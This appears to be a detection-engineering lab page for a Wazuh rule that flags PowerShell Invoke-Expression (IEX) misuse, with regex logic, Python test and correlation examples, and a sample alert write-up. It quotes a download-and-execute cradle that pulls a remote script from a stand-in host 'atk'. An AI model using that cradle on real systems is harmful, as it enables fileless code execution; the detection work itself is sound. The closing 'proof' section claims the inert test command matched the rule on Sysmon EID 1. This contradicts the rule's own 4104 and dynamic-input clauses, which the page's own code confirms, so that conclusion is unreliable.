Phase 1 · T1059.001 · Easy

Detecting Invoke-Expression (IEX) Misuse

Flag Invoke-Expression / IEX patterns that execute downloaded or in-memory strings.

#Windows #PowerShell #ATT&CK

Detection Objective

Detect IEX or Invoke-Expression executing dynamic strings — typically piped from Net.WebClient, DownloadString, or [Convert]::FromBase64String.

Real-World Attack Scenario

A staged loader runs: IEX (New-Object Net.WebClient).DownloadString('http://atk/stage.ps1') to pull and execute a remote PowerShell payload in memory without touching disk.

Why This Detection Matters

IEX with dynamic input is the de-facto fileless execution primitive. Detecting it early disrupts the chain before the second stage runs.

ATT&CK Mapping

T1059.001 · PowerShell
Tactic: Execution

Required Telemetry

  • PowerShell Script Block Logging, Event ID 4104 (best signal: it sees the decoded script body)
  • Sysmon Event ID 1: command line
Windows Event IDs: 4688
Sysmon Event IDs: 1
Wazuh Log Source: Microsoft-Windows-PowerShell/Operational, Sysmon/Operational

Setup Steps

  1. Enable PowerShell Script Block Logging (4104).
  2. Forward Microsoft-Windows-PowerShell/Operational to Wazuh.

Safe Validation Command

Safe equivalent — IEX evaluating an inert literal.
powershell.exe -c "IEX 'Write-Host detection-test'"
⚠ lab use only · this project does not execute real malware

Expected Log Output

EventID 4104
ScriptBlockText: IEX 'Write-Host detection-test'
Path: <ScriptBlock>

Detection Logic (Wazuh rule concept)

EventID=4104 AND ScriptBlockText matches /(?i)(Invoke-Expression|\bIEX\b).*(DownloadString|FromBase64String|Net\.WebClient|IWR|Invoke-WebRequest)/

False Positives

  • Admin scripts that legitimately use IEX with constant input

Tuning Recommendations

  • Require dynamic input source (network or base64) before alerting.
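The rule concept above and the tuning note both come down to one condition: EventID 4104 plus a ScriptBlockText that pairs IEX/Invoke-Expression with a dynamic-input source. The following Python is an added example (not part of the page or of any Wazuh rule set) that runs that exact regex over constructed 4104 events, including the page's attack scenario, a base64 variant, the inert validation string, and a constant-input admin script. Note what it shows: the inert validation literal does not satisfy the rule's dynamic-input clause, so as written the rule fires on the cradle pattern, not on the lab test string.

```python
import re
from dataclasses import dataclass

# Regex from the page's Wazuh rule concept: IEX / Invoke-Expression followed by
# a dynamic-input source (network download or base64 decode).
IEX_CRADLE = re.compile(
    r"(?i)(Invoke-Expression|\bIEX\b).*"
    r"(DownloadString|FromBase64String|Net\.WebClient|IWR|Invoke-WebRequest)"
)


@dataclass
class ScriptBlockEvent:
    """Minimal view of a Microsoft-Windows-PowerShell/Operational event."""
    event_id: int
    script_block_text: str
    path: str = "<ScriptBlock>"


def matches_rule(event: ScriptBlockEvent) -> bool:
    """EventID=4104 AND ScriptBlockText matches the cradle regex."""
    return event.event_id == 4104 and IEX_CRADLE.search(event.script_block_text) is not None


def dynamic_input_source(text: str):
    """Which dynamic-input token fired (for the triage note); None for constant input."""
    m = IEX_CRADLE.search(text)
    return m.group(2) if m else None


# Constructed sample events (not captured from a real host). The first is the
# page's attack scenario; the third is the page's inert validation command.
SAMPLE_EVENTS = [
    ScriptBlockEvent(4104, "IEX (New-Object Net.WebClient).DownloadString('http://atk/stage.ps1')"),
    ScriptBlockEvent(4104, "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b)))"),
    ScriptBlockEvent(4104, "IEX 'Write-Host detection-test'"),
    ScriptBlockEvent(4104, "Invoke-Expression $cmd  # admin script, constant input"),
    ScriptBlockEvent(4103, "IEX (New-Object Net.WebClient).DownloadString('http://atk/stage.ps1')"),
]


def evaluate(events):
    """Return (text, matched, source_token) per event, in input order."""
    return [
        (e.script_block_text, matches_rule(e), dynamic_input_source(e.script_block_text))
        for e in events
    ]


if __name__ == "__main__":
    for text, hit, src in evaluate(SAMPLE_EVENTS):
        print(f"{'ALERT ' if hit else 'ignore'}  source={src!s:18}  {text}")
```

The constant-input admin case (False Positives section) never reaches the alert path because the regex itself enforces the "require dynamic input source" tuning; the 4103 copy shows that the EventID clause is doing real work and the rule should not be widened to other PowerShell event IDs without re-testing.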

Analyst Triage Notes

  • Pull the full ScriptBlockText and the parent process tree.

Detection Improvement Ideas

  • Combine with Sysmon EID 3 to confirm outbound C2.
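The triage note (pull the parent process tree) and the improvement idea (confirm outbound traffic with Sysmon EID 3) are both joins on Sysmon's ProcessGuid. The Python below is an added example, not part of the page or of Wazuh, that correlates constructed EID 1 and EID 3 records and scores each PowerShell process on the risk factors the analyst takeaway lists (download cradle, unexpected parent, hidden window, outbound connection). The GUIDs, the 203.0.113.10 destination, the second process and the EXPECTED_PARENTS baseline are all invented for the example; the first process mirrors the page's lab record.

```python
import ntpath
import re
from dataclasses import dataclass, field

# Same cradle regex as the page's rule concept, reused here for the risk factor.
CRADLE = re.compile(
    r"(?i)(Invoke-Expression|\bIEX\b).*"
    r"(DownloadString|FromBase64String|Net\.WebClient|IWR|Invoke-WebRequest)"
)
# -w hidden / -WindowStyle Hidden in the command line.
HIDDEN = re.compile(r"(?i)-w(indowstyle)?\s+hidden")

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Hypothetical per-host baseline of parents that are normal for interactive PowerShell.
EXPECTED_PARENTS = {r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe"}


@dataclass
class SysmonEvent:
    event_id: int              # 1 = process create, 3 = network connection
    process_guid: str          # ProcessGuid is the join key across Sysmon events
    image: str
    fields: dict = field(default_factory=dict)


# Constructed lab telemetry (GUIDs, destination and second process are invented).
EVENTS = [
    SysmonEvent(1, "{GUID-LAB-0001}", PS_IMAGE, {
        "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\j.doe",
        "CommandLine": "powershell.exe -c \"IEX 'Write-Host detection-test'\"",
        "UtcTime": "2026-05-26 14:32:11.000"}),
    SysmonEvent(3, "{GUID-LAB-0001}", PS_IMAGE, {
        "DestinationIp": "203.0.113.10", "DestinationPort": "80", "Initiated": "true"}),
    SysmonEvent(1, "{GUID-LAB-0002}", PS_IMAGE, {
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "User": r"CORP\j.doe",
        "CommandLine": r"powershell.exe -w hidden -NoProfile -File C:\Scripts\inventory.ps1",
        "UtcTime": "2026-05-26 14:40:02.000"}),
]


def correlate(events):
    """Join EID 1 with EID 3 by ProcessGuid and score each PowerShell process."""
    creates = [e for e in events
               if e.event_id == 1 and e.image.lower().endswith("powershell.exe")]
    connects = {}
    for e in events:
        if e.event_id == 3:
            connects.setdefault(e.process_guid, []).append(e)

    findings = []
    for c in creates:
        conns = connects.get(c.process_guid, [])
        cmd = c.fields.get("CommandLine", "")
        parent = c.fields.get("ParentImage", "")
        factors = {
            "download_cradle": CRADLE.search(cmd) is not None,
            "unexpected_parent": parent not in EXPECTED_PARENTS,
            "hidden_window": HIDDEN.search(cmd) is not None,
            "outbound_connection": bool(conns),
        }
        findings.append({
            "guid": c.process_guid,
            "lineage": f"{ntpath.basename(parent)} -> {ntpath.basename(c.image)}",
            "user": c.fields.get("User"),
            "outbound": [(x.fields["DestinationIp"], x.fields["DestinationPort"]) for x in conns],
            "factors": factors,
            "risk_score": sum(factors.values()),   # one point per risk factor present
        })
    return findings


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f"{f['guid']} {f['lineage']} user={f['user']} "
              f"score={f['risk_score']} outbound={f['outbound']}")
```

The lab validation process scores only on the outbound connection (explorer parent, inert literal, visible window), while the Office-spawned hidden-window process scores on lineage and window state but has no EID 3 to confirm. Either way the analyst gets the lineage string and destination list the triage note asks for in one record instead of three searches.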

log analysis layer

Detection is not complete until the logs prove what happened. The sections below show the telemetry produced by the validation above, how to read it like an analyst, and why this pattern matters.

siem · log evidence
Rule: 100653
Rule name: Detecting Invoke-Expression (IEX) Misuse
Log source: Microsoft-Windows-PowerShell/Operational, Sysmon/Operational
Event ID: Sysmon EID 1
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent: C:\Windows\explorer.exe
CommandLine: powershell.exe -c "IEX 'Write-Host detection-test'"
User: CORP\j.doe
Agent: WIN10-LAB-01
Timestamp: 2026-05-26T14:32:11Z
Analyst note: Pull the full ScriptBlockText and the parent process tree.

Parent → Child Analysis

explorer.exe → powershell.exe: review whether this lineage is expected for WIN10-LAB-01 and user CORP\j.doe. An interactive user launching PowerShell from the shell is common; the same child under an Office application, a browser, or a service account deserves a closer look.

Command-Line Flags Observed

  • IEX / Invoke-Expression
    Executes dynamic strings — the core primitive of fileless loaders.

Parsed Fields the Analyst Reads

  • Image: process binary that executed; confirms PowerShell.
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • ParentImage: who launched it; context for legitimacy.
    C:\Windows\explorer.exe
  • CommandLine: arguments; where attacker intent shows up.
    powershell.exe -c "IEX 'Write-Host detection-test'"
  • User: account context; service vs interactive vs SYSTEM.
    CORP\j.doe
  • EventID: telemetry channel and event type.
    Sysmon EID 1
  • Wazuh Rule ID: rule that matched and produced this alert.
    100653
  • Agent: endpoint that produced the telemetry.
    WIN10-LAB-01
  • Timestamp: when it happened; anchor for correlation.
    2026-05-26T14:32:11Z

Malicious Pattern

Pattern: Invoke-Expression (IEX) Misuse
Description: A staged loader runs: IEX (New-Object Net.WebClient).DownloadString('http://atk/stage.ps1') to pull and execute a remote PowerShell payload in memory without touching disk.
Analyst takeaway: IEX with dynamic input is the de-facto fileless execution primitive. Detecting it early disrupts the chain before the second stage runs. Treat this signal as higher-risk when combined with suspicious parents, hidden windows, download cradles, or unusual user context.

proof the detection worked

Test command: powershell.exe -c "IEX 'Write-Host detection-test'"
Expected event: Sysmon EID 1 on WIN10-LAB-01 with Image=powershell.exe and the validation command above in CommandLine.
Expected Wazuh alert: Wazuh rule 100653, "Detecting Invoke-Expression (IEX) Misuse", fires at a level matching severity=high.
Confirming log fields: Image, ParentImage, CommandLine, User, EventID
Analyst interpretation: The recorded fields satisfy every clause of the detection logic. Parent process, user context, and command-line arguments together prove the behavior was observed end to end.
Conclusion: Detection succeeded: telemetry was captured, the rule matched, and the alert reached the analyst with enough context to triage.